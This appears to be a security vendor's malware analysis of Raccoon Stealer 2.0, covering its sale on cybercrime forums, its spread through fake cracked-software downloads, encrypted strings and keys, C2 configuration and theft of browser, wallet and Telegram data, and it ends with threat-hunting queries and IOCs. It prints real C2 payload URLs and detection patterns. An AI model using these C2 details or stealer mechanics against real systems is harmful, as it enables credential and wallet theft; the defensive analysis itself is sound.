Introduction

Raccoon Stealer is an information stealing trojan which is distributed as Malware-as-a-service (MaaS) model for $75/week or $200/month. Once they have purchased access, a threat actor will get access to an admin panel. This admin panel lets them customize the malware, retrieve logs stolen through their deployments of the tool and create new builds of the malware.  This service has been sold on underground forums since early 2019. The stealer temporarily stopped operations suddenly in March 2022, assumed to be due to the  loss of a developer in the Russian conflict in Ukraine (unverified). Prior to this pause in operations a user profile (username: raccoonstealer)  related to the Raccoon Stealer service stated on the Russian language cybercrime forum 'Exploit’, “Don’t say goodbye forever” and “they are working on second version”.

Since this operational pause FortiGuard Threat Research team identified a new post from ‘racconstealer’ on the ‘Exploit’ forum', advertising a credential stealer named 'Raccoon Stealer 2.0'. The stealer is an updated version of the original Raccoon stealer. The user mentions having set up a beta version of the stealer, which has received positive responses from regular clientele on the forum.

 

Figure 1. Raccoon Stealer 2.0 underground forum post outlining details of the Raccoon Stealer 2.0 malware. This is in Cyrillic (Russian) but a translated version is available below.

 

The new version of Racoon Stealer appears to have been rewritten from scratch, retaining the old features while adding to the appearance and functionality of the admin dashboard. According to the developer, this has apparently reduced the size of the build and made the logs more informative. The following features were said to be present in the new version of the malware (translated from the original post shown above):

• The build has been rewritten in C++, which can now dynamically send the collected logs into divided parts, thereby alleviating the risk of losing the information if flagged by the antivirus
• Smaller build size of 55 kB, as opposed to the previously hefty 580 kB build
• Common proxies have been replaced, reducing the lag in dynamic transmission of the log files
• Users can patch the build with up to 5 unique IP addresses and can monitor them from the admin panel
• Logs can be sent directly to one's Telegram account via the new Telegram bot
• Build now supports collecting data from almost all browsers
• The decryption of passwords and cookies is now performed on the server-side
• Addresses on crypto wallets such as Coinbase, MetaMask, Brave, and Ronin, are now recognized automatically, with Phantom browser to follow suit.
• SSL support added
• Modern and minimal style
• Flexibility in the search system
• Mass deletion from the dashboard itself
• News and Comments sections added
• Frequently Asked Questions (FAQ) section
• A statistical representation of logs
• The actor has quoted a price of $150 USD per week, $275 USD per month, and an additional $50 USD for a unique build with an additional tag.

Figure 2. Raccoon Stealer v2.0 Admin dashboard acquired by FortiRecon researchers.

 

Above screenshots and darknet post information are excerpts taken from a report created on Raccoon V2 by the FortiRecon team. For FortiRecon subscribers, detailed Threat Intelligence report can be accessed at https://fortirecon.forticloud.com/adversary-centric-intelligence/reports?reportId=2022070435322

 

Understanding a Racoon Stealer Intrusion

When Raccoon Stealer malicious file is executed by the targeted user, the created process communicates with command and control server (C2) and attempts to download additional DLL files required to support stealer functions. The attack diagram for this whole process is shown in Figure 3 below. To demonstrate FortiEDR’s ability to detect post-execution behavior we have executed the sample in a test environment with FortiEDR in log only mode. In protect mode FortiEDR will block all activity that results in the creation of a security event.

 

Figure 3 Raccoon V2 Attack diagram

 

The most common method of distribution observed by the FortiGuard Responder team is through the use of fake cracked software websites. This differs from the more common phishing based attacks we see with other malware stealers such as Agent Tesla and redline . One such sample is still being served through an active fake website and was retrieved and analyzed as part of this article. Any software download links for this website redirect to <7 alpha numeric characters>.cfd link which provides a MediaFire link of the final download RAR file. All the RAR files have name like pattern: PA$$w0rds_1234__MainFiles<1number>—<2alphanumeric>.rar

 

Figure 4 Malicious setup download steps for fake cracked software download that results in a Racoon Stealer payload.

 

The downloaded RAR file is password protected and contains two files, one text file which has name “PA$$W0RDz is ==  1234.txt” and other executable file “SetupsCracked1.exe”. Even if user click download link for any cracked software on this website same file is downloaded. When the enclosed executable is executed FortiEDR  detects and mitigates the attemptedexecution. This event is detected but the “Suspicious File Detected” rule within the ‘Execution Prevention’ security policy. An example of one of these generated security events is shown in Figure 5 below.

Figure 5 FortiEDR execution prevention policy event related to user execution of RaccoonV2.

 

FortiEDR detects and mitigates  the malware sample’s attempts to communicate with it’s C2. This block triggers two rules; “PUP - Potentially Unwanted Program” and “Suspicious Packer” both under the Exfiltration Prevention policy. The event generated as part of our analysis can be seen in Figure 6 below.

Figure 6. RaccoonV2 C2 connection blocked

 

The main raccoon stealer executable contains a number of strings encrypted in the malware exe when it is stored as file on the disk which are decrypted at runtime.  The strings are base64 encoded and then encrypted with the RC4 encryption algorithm. The encryption key for the RC4 encryption is stored in the exe itself and in the case of this sample the key was “edinayarossiya”. A blog by ZeroFox Intelligence on Raccoon stealer suggests that translated, Edinaya Rossiya means “United Russia,” which is currently the largest political party in Russia.[1]

The malware C2 IP address is also hardcoded into the exe in a similar encrypted form. But the C2 address is encrypted with a separate encryption key, which in our case was “403f7b121a3afd9e8d27f945140b8a92”. This can be observed in the Figure 7 when the file was run in debug mode for analysis.

 

Figure 7. C2 IP runtime decryption while debugging the executable. Analyzed with the x32dbg tool[2].

 

The malware creates a unique machine-Id of infected machine and sends this machine-Id, username, hard coded encryption key(in field ‘configId’), as a parameter when connecting to the C2 server. The machine-Id is unique per infected host and does not change even if malware executed multiple times on same host.  The C2 IP address is encrypted with same encryption key in the malware sample. Malware sends this data via a HTTP post request like the example provided below in Figure 8.

 

Figure 8 HTTP post request made to Raccoon C2

 

Then C2 server sends configuration to the malware sample, this configuration has custom but plain text format. The data format for configuration is {Field-categary}_{Field-name}:{Field-Value}.Examples of each type of config are shown in Table 1 below.

Config Component	Description
libs_nss3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nss3.dll	Firefox DLL Library file name and URL for download
sstmnfo_System Info.txt:System Information:	Collect system information
|Installed applications:|	Get list of Installed applications
libs_nssdbm3:http://2.58.56.247/aN7jD0qO6kT5bK5bQ4eR8fE1xP7hL2vK/nssdbm3.dll	Firefox DLL Library file name and URL download address
wlts_daedalus:Daedalus;26;Daedalus Mainnet;*;log*,*cache,chain,dictionar*	Collect data from Wallet software Daedalus
ews_metax:mcohilncbfahbmgdjkbpemcciiolgcge;MetaX;Local Extension Settings	Collect data from Browser extension for Metax
scrnsht_Screenshot.jpeg:1	Take screenshot  of computer and send as jpeg file
tlgrm_Telegram:Telegram Desktop\tdata|*|*emoji*,*user_data*,*tdummy*,*dumps*	Collect data of Telegram Chat software
token:37c8b713348e32d66115267ac943a7b6	Page address used for exfiltration

Table 1. C2 configuration explainations

 

The malware downloads the DLL files specified in the configuration data provided by C2, in the case of our sample, the following DLL files were downloaded:

 

DLL File	Download Path	Description
nss3.dll	%USERPROFILE%\AppData\LocalLow\	Firefox DLL Library file
msvcp140.dll	%USERPROFILE%\AppData\LocalLow\	Microsoft C DLL file
vcruntime140.dll	%USERPROFILE%\AppData\LocalLow\	Microsoft VC++ Runtime DLL file
mozglue.dll	%USERPROFILE%\AppData\LocalLow\	Firefox DLL Library file
freebl3.dll	%USERPROFILE%\AppData\LocalLow\	Firefox DLL Library file
softokn3.dll	%USERPROFILE%\AppData\LocalLow\	NSS PKCS library DLL file
sqlite3.dll	%USERPROFILE%\AppData\LocalLow\	DLL Library for sqlite database

Table 2. Download paths and Description of DLL files downloaded by Malware

 

The files are 3^rd party DLL files from various software. All of these files are shown as clean by all Antivirus engines on Virustotal.

 

Following download of these files, the malware sends system information and list of installed applications to C2 in format shown below in Figure 9. After sending system information the malware sends the cookies from web-browser to C2.

Figure 9 System information sent to C2 as stealer communication

 

After sending the system info and cookies the malware takes a  screenshot of the infected machine and sends it to the C2 server. There is a field scrnsht_Screenshot.jpeg  in the config data. The malware takes screenshots and sends the screenshot with the filename “---Screenshot.jpeg”.  The screenshot jpeg file is not written on the disk it only present in memory.

 

Conclusion

In this article we have analyzed RaccoonV2 sample and observed how the FortiEDR detects the malicious sample and blocks communication of malicious sample with its C2 server.

 

Threat Hunting

 

Execution of the above analyzed Racoon Stealer sample can be detected using the following Threat Hunting query. This query identifies 'Process Creation' events that match the provided hashes of two known Racoon Stealer hashes. This query will only detect the analyzed samples and may not detect future variants as hash of those variants would change. :

 

Type:"Process Creation" AND Target.Process.File.SHA1:("b4cf85691dcc7c6e2d709b292056d404e7fb58f0" OR "19d9fbfd9b23d4bd435746a524443f1a962d42fa" OR "7cead6f1e4c4b0824365268cdd5d168acf56265c" OR "19d9fbfd9b23d4bd435746a524443f1a962d42fa")

 

 

 

Network connections to known Racoon Stealer C2 can be found using following Threat Hunting query. The query will find events of type “Socket Connect” where remote IP address matches known C2. This C2 server is associated with analyzed samples and this query would not detect future C2 server communication:

 

Type:"Socket Connect" AND RemoteIP: (2.58.56.247 OR 51.195.166.184)

 

 

 

The HTTP request made by malware to C2 can be searched using following Threat Hunting query. This C2 server is associated with analyzed samples and this query would not detect future C2 server communication:

 

Type:"HTTP Request" AND  URL:"http://2.58.56.247:80"

 

 

 

The Malware downloads DLL files for modules execution, file creation events generated as a result of these downloads can be find in network threat hunting data using following threat hunting query. This query will find file creation events and where the file path has a specific folder in it and the created file is one of the dlls downloaded by the Raccon Stealer malware:

 

Type:"File Create" AND Target.File.Path:(\\AppData\\LocalLow) AND Target.File.Name:(nss3.dll OR msvcp140.dll OR vcruntime140.dll OR mozglue.dll OR freebl3.dll OR softokn3.dll OR sqlite3.dll OR nssdbm3.dll)

 

 

 

The most prominent distribution of Raccoon V2 malware was download as fake cracked setup file in RAR file format. We can search the network for similar malicious file download events. The file download event some times creates file with “.partial” extension and then after completion renames the file. To detect both these type of events the following query will look for both “File Create” or “File Rename” events with the specific filename pattern employed by the Racoon Stealer distribution website.

 

 (Type:"File Create" AND PA$$w0rds_1234__* AND Target.File.Ext:"rar") OR (Type:"File Rename" AND Target.File.Ext:"partial" AND PA$$w0rds_1234__* )  

 

 

MITRE ATT&CK

 

TA0005 - Defense Evasion

Technique ID	Technique Description	Observed Activity
T1036	Masquerading	Creates files inside the user directory

 

TA0006 - Credential Access

Technique ID	Technique Description	Observed Activity
T1003	OS Credential Dumping	Tries to harvest and steal browser information (history, passwords, etc)

 

 

TA0007 – Discovery

Technique ID	Technique Description	Observed Activity
T1082	System Information Discovery	1) Queries the cryptographic machine GUID 2) Reads software policies
T1083	File and Directory Discovery	Enumerates the file system

 

TA0009 - Collection

Technique ID	Technique Description	Observed Activity
T1005	Data from Local System	1) Tries to harvest and steal browser information (history, passwords, etc) 2) Tries to steal Crypto Currency Wallets

 

TA0011 – Command and Control

Technique ID	Technique Description	Observed Activity
T1071	Application Layer Protocol	1) Downloads executable code via HTTP 2) Downloads files from webservers via HTTP 3) Posts data to webserver
T1095	Non-Application Layer Protocol	1) Downloads files from webservers via HTTP 2) Posts data to webserver
T1105	Ingress Tool Transfer	1) Downloads executable code via HTTP 2) Downloads files from webservers via HTTP

 

 

 

IOCs (Indicators Of Compromise)

 

Indicator Description	Indicator	Indicator Type	Associated Tactic	Notes	First Observed
C2 IP	2.58.56[.]247	IP Address	Command and Control	This C2 IP was contacted by Raccon Stealer following execution of the main payload.	2022-06-30
C2 IP	51.195.166[.]184	IP Address	Command and Control	This C2 IP was contacted by  Raccon Stealer following execution of the main payload.	2022-07-01
SHA1 Hash	b4cf85691dcc7c6e2d709b292056d404e7fb58f0	SHA1 Hash	Execution, Command and Control	Racoon Stealer main executable file hash	2022-06-14
SHA1 Hash	19d9fbfd9b23d4bd435746a524443f1a962d42fa	SHA1 Hash	Execution, Command and Control	Racoon Stealer main executable file hash	2022-06-22
SHA1 Hash	7cead6f1e4c4b0824365268cdd5d168acf56265c	SHA1 Hash	Execution, Command and Control	Raccoon Stealer sample with similar behavior and connecting to same C2	2022-06-30
SHA1 Hash	19d9fbfd9b23d4bd435746a524443f1a962d42fa	SHA1 Hash	Execution, Command and Control	Raccoon Stealer sample with similar behavior and connecting to same C2	2022-06-30

 

 

[1] https://www.zerofox.com/blog/brief-raccoon-stealer-version-2-0/

 

[2] https://x64dbg.com/